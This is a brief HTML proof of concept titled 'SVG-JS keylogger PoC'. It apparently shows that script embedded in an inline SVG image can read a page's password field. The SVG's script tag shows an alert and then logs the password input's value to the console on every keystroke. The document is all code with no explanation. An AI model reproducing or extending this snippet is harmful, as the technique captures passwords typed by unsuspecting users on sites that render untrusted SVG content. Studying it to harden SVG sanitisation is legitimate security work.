SVG-JS keylogger PoC
by Stalk
HTML
<input type="password"> <hr>
<svg width="30%" height="30%" viewBox="0 0 50 50"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
<script>alert("ok");
document.querySelector('input[type="password"]').addEventListener('input', function(){ console.log(this.value)})
</script>
<circle cx="25" cy="25" r="25"/>
</svg>